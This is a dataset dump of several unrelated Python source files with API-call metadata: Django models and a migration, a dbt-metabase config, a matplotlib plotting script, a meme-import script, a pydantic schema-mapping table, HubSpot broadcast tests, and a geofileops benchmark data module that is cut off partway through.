repo_name (string, 7-94 chars) | repo_path (string, 4-237 chars) | repo_head_hexsha (string, 40 chars) | content (string, 10-680k chars) | apis (string, 2-840k chars)
---|---|---|---|---
sheriffbarrow/production-ecommerce | src/production_ecommerce/account/models.py | cb1a29795ff8e9b4aa95a78df50bb8aa3e5f4350 | from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager
class MyAccountManager(BaseUserManager):
def create_user(self, email, username, password=None):
if not email:
raise ValueError('Users must have an email address')
if not username:
raise ValueError('Users must have a username')
user = self.model(
email=self.normalize_email(email),
username=username,
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, username, password):
user = self.create_user(
email=self.normalize_email(email),
password=password,
username=username,
)
user.is_admin = True
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class UserVendor(AbstractBaseUser):
email = models.EmailField(verbose_name='email address',max_length=255,unique=True)
contact = models.IntegerField(null=True, blank=True)
username = models.CharField(max_length=30)
location = models.CharField(max_length=30)
profession = models.CharField(max_length=30)
experience = models.CharField(max_length=30)
verified_id = models.CharField(max_length=255)
date_joined = models.DateTimeField(verbose_name='date joined', auto_now_add=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
image = models.ImageField(default='profile1.png' ,upload_to='profiles/images/', null=True, blank=True)
    # Note the absence of a password field; it is built into AbstractBaseUser.
objects = MyAccountManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username'] # Email & Password are required by default.
def __str__(self):
return self.email
    # For checking permissions. To keep it simple, all admins have ALL permissions.
def has_perm(self, perm, obj=None):
return self.is_admin
# Does this user have permission to view this app? (ALWAYS YES FOR SIMPLICITY)
def has_module_perms(self, app_label):
return True
class Client(AbstractBaseUser):
email = models.EmailField(verbose_name='email address',max_length=255,unique=True)
contact = models.IntegerField(null=True, blank=True)
username = models.CharField(max_length=30)
location = models.CharField(max_length=30)
date_joined = models.DateTimeField(verbose_name='date joined', auto_now_add=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
    # Note the absence of a password field; it is built into AbstractBaseUser.
objects = MyAccountManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username'] # Email & Password are required by default.
def __str__(self):
return self.email
    # For checking permissions. To keep it simple, all admins have ALL permissions.
def has_perm(self, perm, obj=None):
return self.is_admin
# Does this user have permission to view this app? (ALWAYS YES FOR SIMPLICITY)
def has_module_perms(self, app_label):
return True
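# --- Illustrative usage sketch (not part of the original file) ---
# Assuming one of these models is registered as the project user model in
# settings.py (e.g. AUTH_USER_MODEL = 'account.UserVendor'), accounts would
# typically be created through the custom manager defined above:
#
#     vendor = UserVendor.objects.create_user(
#         email='[email protected]', username='vendor1', password='s3cret')
#     boss = UserVendor.objects.create_superuser(
#         email='[email protected]', username='boss', password='s3cret')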
| [((35, 9, 35, 83), 'django.db.models.EmailField', 'models.EmailField', (), '', False, 'from django.db import models\n'), ((36, 11, 36, 53), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((37, 12, 37, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((38, 12, 38, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((39, 14, 39, 45), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((40, 14, 40, 45), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((41, 15, 41, 47), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((42, 15, 42, 82), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((43, 15, 43, 48), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((44, 15, 44, 49), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((45, 15, 45, 49), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((46, 9, 46, 103), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import models\n'), ((67, 9, 67, 83), 'django.db.models.EmailField', 'models.EmailField', (), '', False, 'from django.db import models\n'), ((68, 11, 68, 53), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((69, 12, 69, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((70, 12, 70, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((71, 15, 71, 82), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((72, 15, 72, 48), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((73, 15, 73, 49), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((74, 15, 74, 49), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n')] |
fernandobrito/dbt-metabase | dbtmetabase/models/config.py | a1fa5a2c7c5e3cf12ead8806d39f6bd3a212fb83 | from dataclasses import dataclass, field
from typing import Optional, Iterable, Union
@dataclass
class MetabaseConfig:
# Metabase Client
database: str
host: str
user: str
password: str
# Metabase additional connection opts
use_http: bool = False
verify: Union[str, bool] = True
# Metabase Sync
sync_skip: bool = False
sync_timeout: Optional[int] = None
@dataclass
class DbtConfig:
# dbt Reader
database: str
manifest_path: Optional[str] = None
path: Optional[str] = None
# dbt Target Models
schema: Optional[str] = None
schema_excludes: Iterable = field(default_factory=list)
includes: Iterable = field(default_factory=list)
excludes: Iterable = field(default_factory=list)
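# --- Illustrative construction sketch (not part of the original module) ---
# Given the dataclasses above, a caller would presumably build the two configs
# along these lines (all concrete values below are made up):
#
#     metabase = MetabaseConfig(database="dbt", host="metabase.example.com",
#                               user="bot", password="secret", sync_timeout=60)
#     dbt = DbtConfig(database="analytics",
#                     manifest_path="target/manifest.json",
#                     schema="public", includes=["dim_customers"])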
| [((28, 32, 28, 59), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((29, 25, 29, 52), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((30, 25, 30, 52), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n')] |
arunksaha/heap_tracker | src/plot_timeseries_outstanding_bytes.py | 0755c6b9c3e4e621efda31c144421a1e67e51a9c | #
# Copyright 2018, Arun Saha <[email protected]>
#
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as md
import datetime as dt
import sys
import os
# Open the file, read the string contents into a list,
# and return the list.
def GetLinesListFromFile(filename):
with open(filename) as f:
content = f.readlines()
return content
# Convert usecs (numeric) to datetime
# >>> ts = 1520189090755278 / 1000000.0
# >>> x = datetime.datetime.fromtimestamp(ts)
# >>> x.strftime('%Y-%m-%d %H:%M:%S.%f')
# '2018-03-04 10:44:50.755278'
def ConvertUsecsEpochToDateTime(usecs):
secs = usecs / 1000000.0
# Attempt to parse usecs throws:
# ValueError: year is out of range
# So, using secs instead. REVISIT.
# datetimeObj = dt.datetime.fromtimestamp(usecs)
datetimeObj = dt.datetime.fromtimestamp(secs)
# print usecs, secs, datetimeObj
return datetimeObj
# Take a list of string tuples (timestamp, metric),
# parses them into numerical values and returns
# separate lists.
def GetTxListFromFile(filename):
lineList = GetLinesListFromFile(filename)
datetimeList = []
outBytesList = []
for line in lineList:
tokens = line.split()
# print tokens
assert(len(tokens) >= 2)
usecs = int(tokens[0])
bytes = int(tokens[1])
datetimeObj = ConvertUsecsEpochToDateTime(usecs)
datetimeList.append(datetimeObj)
outBytesList.append(bytes)
return datetimeList, outBytesList
# Plotting driver program.
def driver(dataFile):
datetimeList, outBytesList = GetTxListFromFile(dataFile)
plt.subplots_adjust(bottom = 0.2)
plt.xticks(rotation = 25)
ax = plt.gca()
# Intended to show micro-seconds, but facing some problem,
# see REVISIT above.
# xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S.%f')
xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S')
ax.xaxis.set_major_formatter(xfmt)
    # Avoid scientific notation, use plain numbers.
ax.get_yaxis().get_major_formatter().set_scientific(False)
# Make the numbers comma separated.
ax.get_yaxis().set_major_formatter(
matplotlib.ticker.FuncFormatter(lambda bytes, p: format(int(bytes), ',')))
    # Intended to show the y-axis numbers on both sides, but it is not working.
ax.yaxis.set_ticks_position('both')
plt.plot(datetimeList, outBytesList)
plt.title('Outstanding Bytes Timeseries')
plt.ylabel('bytes')
plt.xlabel('timestamp')
plt.grid(True)
plt.show()
# main
if len(sys.argv) == 1:
print "usage: {} <input-text-file>".format(sys.argv[0])
sys.exit(1)
driver(sys.argv[1])
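# --- Example invocation (added for illustration; the file name is hypothetical) ---
# Each input line is expected to hold "<epoch_microseconds> <outstanding_bytes>",
# whitespace separated, as parsed by GetTxListFromFile above:
#
#     python plot_timeseries_outstanding_bytes.py outstanding_bytes.txt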
| [] |
vmariano/meme-classifier | import.py | e8d6e73e4a843542143f20381c0741df16d3945d | from dotenv import load_dotenv
load_dotenv()
import sys
import os
import re
import json
import psycopg2
from meme_classifier.images import process_image
path = sys.argv[1]
data = json.load(open(os.path.join(path, 'result.json'), 'r'))
chat_id = data['id']
conn = psycopg2.connect(os.getenv('POSTGRES_CREDENTIALS'))
for m in data['messages']:
if 'photo' in m:
template, text = process_image(open(os.path.join(path, m['photo']), 'rb'))
message_id = m['id']
print(f'processing message {message_id}')
cur = conn.cursor()
cur.execute("INSERT INTO meme (template, text, chat_id, message_id) VALUES (%s, %s, %s, %s)", (template, text, chat_id, message_id))
conn.commit()
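# --- Example invocation (added for illustration) ---
# Assumed layout: a Telegram chat export directory containing result.json plus
# the photo files it references; POSTGRES_CREDENTIALS is read from the .env
# file loaded above.
#
#     python import.py /path/to/chat_export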
| [((2, 0, 2, 13), 'dotenv.load_dotenv', 'load_dotenv', ({}, {}), '()', False, 'from dotenv import load_dotenv\n'), ((16, 24, 16, 57), 'os.getenv', 'os.getenv', ({(16, 34, 16, 56): '"""POSTGRES_CREDENTIALS"""'}, {}), "('POSTGRES_CREDENTIALS')", False, 'import os\n'), ((14, 22, 14, 55), 'os.path.join', 'os.path.join', ({(14, 35, 14, 39): 'path', (14, 41, 14, 54): '"""result.json"""'}, {}), "(path, 'result.json')", False, 'import os\n'), ((20, 44, 20, 74), 'os.path.join', 'os.path.join', ({(20, 57, 20, 61): 'path', (20, 63, 20, 73): "m['photo']"}, {}), "(path, m['photo'])", False, 'import os\n')] |
jak0203/nps-dash | nps/migrations/0013_auto_20180314_1805.py | 9a3bdb0e55e0c857bcce8ed8df04b52a2b71872f | # Generated by Django 2.0.3 on 2018-03-15 01:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nps', '0012_auto_20180314_1600'),
]
operations = [
migrations.CreateModel(
name='ClientAggregations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('client', models.CharField(max_length=30)),
('survey', models.CharField(max_length=30)),
('user_type', models.CharField(blank=True, default=None, max_length=30, null=True)),
('nps_score', models.FloatField()),
('total_responses', models.IntegerField()),
('promoters', models.IntegerField()),
('detractors', models.IntegerField()),
('neutral', models.IntegerField()),
('percent_detractors', models.FloatField(blank=True, default=None, null=True)),
('percent_promoters', models.FloatField(blank=True, default=None, null=True)),
('percent_neutral', models.FloatField(blank=True, default=None, null=True)),
('statistically_significant', models.BooleanField(default=False)),
],
),
migrations.DeleteModel(
name='AggregatedResults',
),
migrations.DeleteModel(
name='ProductUsers',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_detractors',
new_name='detractors',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_neutral',
new_name='neutral',
),
migrations.RenameField(
model_name='productaggregations',
old_name='number_clients_negative',
new_name='num_clients_negative',
),
migrations.RenameField(
model_name='productaggregations',
old_name='number_clients_positive',
new_name='num_clients_positive',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_promoters',
new_name='promoters',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_detractors',
new_name='detractors',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_neutral',
new_name='neutral',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='number_clients_negative',
new_name='num_clients_negative',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='number_clients_positive',
new_name='num_clients_positive',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_promoters',
new_name='promoters',
),
migrations.RemoveField(
model_name='productaggregations',
name='number_clients_neutral',
),
migrations.RemoveField(
model_name='productaggregations',
name='percent_clients_neutral',
),
migrations.RemoveField(
model_name='surveyaggregations',
name='number_clients_neutral',
),
migrations.RemoveField(
model_name='surveyaggregations',
name='percent_clients_neutral',
),
migrations.AddField(
model_name='productaggregations',
name='user_type',
field=models.CharField(blank=True, default=None, max_length=30, null=True),
),
migrations.AddField(
model_name='surveyaggregations',
name='user_type',
field=models.CharField(blank=True, default=None, max_length=30, null=True),
),
migrations.AlterUniqueTogether(
name='clientaggregations',
unique_together={('client', 'survey', 'user_type')},
),
]
| [((31, 8, 33, 9), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', (), '', False, 'from django.db import migrations, models\n'), ((34, 8, 36, 9), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', (), '', False, 'from django.db import migrations, models\n'), ((37, 8, 41, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((42, 8, 46, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((47, 8, 51, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((52, 8, 56, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((57, 8, 61, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((62, 8, 66, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((67, 8, 71, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((72, 8, 76, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((77, 8, 81, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((82, 8, 86, 9), 'django.db.migrations.RenameField', 'migrations.RenameField', (), '', False, 'from django.db import migrations, models\n'), ((87, 8, 90, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((91, 8, 94, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((95, 8, 98, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((99, 8, 102, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((113, 8, 116, 9), 'django.db.migrations.AlterUniqueTogether', 'migrations.AlterUniqueTogether', (), '', False, 'from django.db import migrations, models\n'), ((106, 18, 106, 86), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((111, 18, 111, 86), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((16, 23, 16, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((17, 27, 17, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((18, 27, 18, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((19, 30, 19, 98), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((20, 30, 20, 49), 'django.db.models.FloatField', 'models.FloatField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((21, 36, 21, 57), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((22, 30, 22, 51), 'django.db.models.IntegerField', 
'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((23, 31, 23, 52), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((24, 28, 24, 49), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((25, 39, 25, 93), 'django.db.models.FloatField', 'models.FloatField', (), '', False, 'from django.db import migrations, models\n'), ((26, 38, 26, 92), 'django.db.models.FloatField', 'models.FloatField', (), '', False, 'from django.db import migrations, models\n'), ((27, 36, 27, 90), 'django.db.models.FloatField', 'models.FloatField', (), '', False, 'from django.db import migrations, models\n'), ((28, 46, 28, 80), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import migrations, models\n')] |
NoAnyLove/pydantic | docs/schema_mapping.py | 50fd2c5b48ffe611b5c4feb24f26f7202217faab | #!/usr/bin/env python3
"""
Build a table of Python / Pydantic to JSON Schema mappings.
Done like this rather than as a raw rst table to make future edits easier.
Please edit this file directly, not .tmp_schema_mappings.rst
"""
table = [
[
'bool',
'boolean',
'',
'JSON Schema Core',
''
],
[
'str',
'string',
'',
'JSON Schema Core',
''
],
[
'float',
'number',
'',
'JSON Schema Core',
''
],
[
'int',
'integer',
'',
'JSON Schema Validation',
''
],
[
'dict',
'object',
'',
'JSON Schema Core',
''
],
[
'list',
'array',
'',
'JSON Schema Core',
''
],
[
'tuple',
'array',
'',
'JSON Schema Core',
''
],
[
'set',
'array',
'{"uniqueItems": true}',
'JSON Schema Validation',
''
],
[
'List[str]',
'array',
'{"items": {"type": "string"}}',
'JSON Schema Validation',
'And equivalently for any other sub type, e.g. List[int].'
],
[
'Tuple[str, int]',
'array',
'{"items": [{"type": "string"}, {"type": "integer"}]}',
'JSON Schema Validation',
(
'And equivalently for any other set of subtypes. Note: If using schemas for OpenAPI, '
'you shouldn\'t use this declaration, as it would not be valid in OpenAPI (although it is '
'valid in JSON Schema).'
)
],
[
'Dict[str, int]',
'object',
'{"additionalProperties": {"type": "integer"}}',
'JSON Schema Validation',
(
'And equivalently for any other subfields for dicts. Have in mind that although you can use other types as '
'keys for dicts with Pydantic, only strings are valid keys for JSON, and so, only str is valid as '
'JSON Schema key types.'
)
],
[
'Union[str, int]',
'anyOf',
'{"anyOf": [{"type": "string"}, {"type": "integer"}]}',
'JSON Schema Validation',
'And equivalently for any other subfields for unions.'
],
[
'Enum',
'enum',
'{"enum": [...]}',
'JSON Schema Validation',
'All the literal values in the enum are included in the definition.'
],
[
'SecretStr',
'string',
'{"writeOnly": true}',
'JSON Schema Validation',
''
],
[
'SecretBytes',
'string',
'{"writeOnly": true}',
'JSON Schema Validation',
''
],
[
'EmailStr',
'string',
'{"format": "email"}',
'JSON Schema Validation',
''
],
[
'NameEmail',
'string',
'{"format": "name-email"}',
'Pydantic standard "format" extension',
''
],
[
'UrlStr',
'string',
'{"format": "uri"}',
'JSON Schema Validation',
''
],
[
'DSN',
'string',
'{"format": "dsn"}',
'Pydantic standard "format" extension',
''
],
[
'bytes',
'string',
'{"format": "binary"}',
'OpenAPI',
''
],
[
'Decimal',
'number',
'',
'JSON Schema Core',
''
],
[
'UUID1',
'string',
'{"format": "uuid1"}',
'Pydantic standard "format" extension',
''
],
[
'UUID3',
'string',
'{"format": "uuid3"}',
'Pydantic standard "format" extension',
''
],
[
'UUID4',
'string',
'{"format": "uuid4"}',
'Pydantic standard "format" extension',
''
],
[
'UUID5',
'string',
'{"format": "uuid5"}',
'Pydantic standard "format" extension',
''
],
[
'UUID',
'string',
'{"format": "uuid"}',
'Pydantic standard "format" extension',
'Suggested in OpenAPI.'
],
[
'FilePath',
'string',
'{"format": "file-path"}',
'Pydantic standard "format" extension',
''
],
[
'DirectoryPath',
'string',
'{"format": "directory-path"}',
'Pydantic standard "format" extension',
''
],
[
'Path',
'string',
'{"format": "path"}',
'Pydantic standard "format" extension',
''
],
[
'datetime',
'string',
'{"format": "date-time"}',
'JSON Schema Validation',
''
],
[
'date',
'string',
'{"format": "date"}',
'JSON Schema Validation',
''
],
[
'time',
'string',
'{"format": "time"}',
'JSON Schema Validation',
''
],
[
'timedelta',
'number',
'{"format": "time-delta"}',
'Difference in seconds (a ``float``), with Pydantic standard "format" extension',
'Suggested in JSON Schema repository\'s issues by maintainer.'
],
[
'Json',
'string',
'{"format": "json-string"}',
'Pydantic standard "format" extension',
''
],
[
'IPvAnyAddress',
'string',
'{"format": "ipvanyaddress"}',
'Pydantic standard "format" extension',
'IPv4 or IPv6 address as used in ``ipaddress`` module',
],
[
'IPvAnyInterface',
'string',
'{"format": "ipvanyinterface"}',
'Pydantic standard "format" extension',
'IPv4 or IPv6 interface as used in ``ipaddress`` module',
],
[
'IPvAnyNetwork',
'string',
'{"format": "ipvanynetwork"}',
'Pydantic standard "format" extension',
'IPv4 or IPv6 network as used in ``ipaddress`` module',
],
[
'StrictStr',
'string',
'',
'JSON Schema Core',
''
],
[
'ConstrainedStr',
'string',
'',
'JSON Schema Core',
(
'If the type has values declared for the constraints, they are included as validations. '
'See the mapping for ``constr`` below.'
)
],
[
'constr(regex=\'^text$\', min_length=2, max_length=10)',
'string',
'{"pattern": "^text$", "minLength": 2, "maxLength": 10}',
'JSON Schema Validation',
'Any argument not passed to the function (not defined) will not be included in the schema.'
],
[
'ConstrainedInt',
'integer',
'',
'JSON Schema Core',
(
'If the type has values declared for the constraints, they are included as validations. '
'See the mapping for ``conint`` below.'
)
],
[
'conint(gt=1, ge=2, lt=6, le=5, multiple_of=2)',
'integer',
'{"maximum": 5, "exclusiveMaximum": 6, "minimum": 2, "exclusiveMinimum": 1, "multipleOf": 2}',
        'JSON Schema Validation',
'Any argument not passed to the function (not defined) will not be included in the schema.'
],
[
'PositiveInt',
'integer',
'{"exclusiveMinimum": 0}',
'JSON Schema Validation',
''
],
[
'NegativeInt',
'integer',
'{"exclusiveMaximum": 0}',
'JSON Schema Validation',
''
],
[
'ConstrainedFloat',
'number',
'',
'JSON Schema Core',
(
            'If the type has values declared for the constraints, they are included as validations. '
'See the mapping for ``confloat`` below.'
)
],
[
'confloat(gt=1, ge=2, lt=6, le=5, multiple_of=2)',
'number',
'{"maximum": 5, "exclusiveMaximum": 6, "minimum": 2, "exclusiveMinimum": 1, "multipleOf": 2}',
'JSON Schema Validation',
'Any argument not passed to the function (not defined) will not be included in the schema.'
],
[
'PositiveFloat',
'number',
'{"exclusiveMinimum": 0}',
'JSON Schema Validation',
''
],
[
'NegativeFloat',
'number',
'{"exclusiveMaximum": 0}',
'JSON Schema Validation',
''
],
[
'ConstrainedDecimal',
'number',
'',
'JSON Schema Core',
(
'If the type has values declared for the constraints, they are included as validations. '
'See the mapping for ``condecimal`` below.'
)
],
[
'condecimal(gt=1, ge=2, lt=6, le=5, multiple_of=2)',
'number',
'{"maximum": 5, "exclusiveMaximum": 6, "minimum": 2, "exclusiveMinimum": 1, "multipleOf": 2}',
'JSON Schema Validation',
'Any argument not passed to the function (not defined) will not be included in the schema.'
],
[
'BaseModel',
'object',
'',
'JSON Schema Core',
'All the properties defined will be defined with standard JSON Schema, including submodels.'
]
]
headings = [
'Python type',
'JSON Schema Type',
'Additional JSON Schema',
'Defined in',
'Notes',
]
v = ''
col_width = 300
for _ in range(5):
v += '+' + '-' * col_width
v += '+\n|'
for heading in headings:
v += f' {heading:{col_width - 2}} |'
v += '\n'
for _ in range(5):
v += '+' + '=' * col_width
v += '+'
for row in table:
v += '\n|'
for i, text in enumerate(row):
text = f'``{text}``' if i < 3 and text else text
v += f' {text:{col_width - 2}} |'
v += '\n'
for _ in range(5):
v += '+' + '-' * col_width
v += '+'
with open('.tmp_schema_mappings.rst', 'w') as f:
f.write(v)
| [] |
kevin2357/hubspot3 | hubspot3/test/test_broadcast.py | 488f6ff4195034317d99431439087443bca1469f | import time
import unittest
from nose.plugins.attrib import attr
from hubspot3.test import helper
from hubspot3.broadcast import Broadcast, BroadcastClient
class BroadcastClientTest(unittest.TestCase):
""" Unit tests for the HubSpot Broadcast API Python client.
This file contains some unittest tests for the Broadcast API.
Questions, comments: http://docs.hubapi.com/wiki/Discussion_Group
"""
def setUp(self):
self.client = BroadcastClient(**helper.get_options())
self.broadcast_guids = None
def tearDown(self):
# Cancel any broadcasts created as part of the tests
if self.broadcast_guids:
list(map(self.client.cancel_broadcast, self.broadcast_guids))
@attr("api")
def test_get_broadcasts(self):
# Should fetch at least 1 broadcast on the test portal 62515
broadcasts = self.client.get_broadcasts(limit=1)
self.assertTrue(len(broadcasts) > 0)
broadcast = broadcasts[0].to_dict()
self.assertIsNotNone(broadcast["channelGuid"])
print("\n\nFetched some broadcasts")
broadcast_guid = broadcast["broadcastGuid"]
# Re-fetch the broadcast using different call
bcast = self.client.get_broadcast(broadcast_guid)
# Should have expected fields
self.assertIsNotNone(bcast.broadcast_guid)
self.assertIsNotNone(bcast.channel_guid)
self.assertIsNotNone(bcast.status)
@attr("api")
def test_get_channels(self):
# Fetch older channels ensured to exist
channels = self.client.get_channels(current=True)
self.assertTrue(len(channels) > 0)
@attr("api")
def test_create_broadcast(self):
content = dict(body="Test hubspot3 unit tests http://www.hubspot.com")
channels = self.client.get_channels(current=True, publish_only=True)
if len(channels) == 0:
self.fail("Failed to find a publishable channel")
channel = channels[0]
# Get a trigger in the future
trigger_at = int(time.time() + 6000) * 1000
bcast = Broadcast(
{
"content": content,
"triggerAt": trigger_at,
"channelGuid": channel.channel_guid,
}
)
try:
resp = self.client.create_broadcast(bcast)
broadcast = Broadcast(resp)
self.assertIsNotNone(broadcast.broadcast_guid)
self.assertEqual(channel.channel_guid, broadcast.channel_guid)
# Ensure it is canceled
self.broadcast_guids = []
self.broadcast_guids.append(broadcast.broadcast_guid)
except Exception as e:
self.fail("Should not have raised exception: {}".format(e))
if __name__ == "__main__":
unittest.main()
| [((25, 5, 25, 16), 'nose.plugins.attrib.attr', 'attr', ({(25, 10, 25, 15): '"""api"""'}, {}), "('api')", False, 'from nose.plugins.attrib import attr\n'), ((43, 5, 43, 16), 'nose.plugins.attrib.attr', 'attr', ({(43, 10, 43, 15): '"""api"""'}, {}), "('api')", False, 'from nose.plugins.attrib import attr\n'), ((49, 5, 49, 16), 'nose.plugins.attrib.attr', 'attr', ({(49, 10, 49, 15): '"""api"""'}, {}), "('api')", False, 'from nose.plugins.attrib import attr\n'), ((81, 4, 81, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((60, 16, 66, 9), 'hubspot3.broadcast.Broadcast', 'Broadcast', ({(61, 12, 65, 13): "{'content': content, 'triggerAt': trigger_at, 'channelGuid': channel.\n channel_guid}"}, {}), "({'content': content, 'triggerAt': trigger_at, 'channelGuid':\n channel.channel_guid})", False, 'from hubspot3.broadcast import Broadcast, BroadcastClient\n'), ((70, 24, 70, 39), 'hubspot3.broadcast.Broadcast', 'Broadcast', ({(70, 34, 70, 38): 'resp'}, {}), '(resp)', False, 'from hubspot3.broadcast import Broadcast, BroadcastClient\n'), ((17, 40, 17, 60), 'hubspot3.test.helper.get_options', 'helper.get_options', ({}, {}), '()', False, 'from hubspot3.test import helper\n'), ((59, 25, 59, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
theroggy/geofile_ops | benchmark/benchmarks/testdata.py | 1b5ab42169d5c3332c0d8298c5a036257cfd68d5 | # -*- coding: utf-8 -*-
"""
Module to prepare test data for benchmarking geo operations.
"""
import enum
import logging
from pathlib import Path
import pprint
import shutil
import sys
import tempfile
from typing import Optional
import urllib.request
import zipfile
# Add path so the benchmark packages are found
sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent))
import geofileops as gfo
################################################################################
# Some inits
################################################################################
logger = logging.getLogger(__name__)
################################################################################
# The real work
################################################################################
class TestFile(enum.Enum):
AGRIPRC_2018 = (
0,
"https://downloadagiv.blob.core.windows.net/landbouwgebruikspercelen/2018/Landbouwgebruikspercelen_LV_2018_GewVLA_Shape.zip",
"agriprc_2018.gpkg",
)
AGRIPRC_2019 = (
1,
"https://downloadagiv.blob.core.windows.net/landbouwgebruikspercelen/2019/Landbouwgebruikspercelen_LV_2019_GewVLA_Shapefile.zip",
"agriprc_2019.gpkg",
)
COMMUNES = (
2,
"https://downloadagiv.blob.core.windows.net/referentiebestand-gemeenten/VoorlopigRefBestandGemeentegrenzen_2019-01-01/VRBG_toestand_16_05_2018_(geldend_vanaf_01_01_2019)_GewVLA_Shape.zip",
"communes.gpkg",
)
def __init__(self, value, url, filename):
self._value_ = value
self.url = url
self.filename = filename
def get_file(self, tmp_dir: Path) -> Path:
testfile_path = download_samplefile(
url=self.url, dst_name=self.filename, dst_dir=tmp_dir
)
testfile_info = gfo.get_layerinfo(testfile_path)
logger.debug(
f"TestFile {self.name} contains {testfile_info.featurecount} rows."
)
return testfile_path
def download_samplefile(
url: str, dst_name: str, dst_dir: Optional[Path] = None
) -> Path:
"""
Download a sample file to dest_path.
If it is zipped, it will be unzipped. If needed, it will be converted to
the file type as determined by the suffix of dst_name.
Args:
        url (str): the url of the file to download
        dst_name (str): the file name to give the downloaded sample file; its
            suffix determines the file type it is converted to if needed.
        dst_dir (Path): the dir to download the sample file to.
            If it is None, a dir in the default tmp location will be
            used. Defaults to None.
Returns:
Path: the path to the downloaded sample file.
"""
# If the destination path is a directory, use the default file name
dst_path = prepare_dst_path(dst_name, dst_dir)
# If the sample file already exists, return
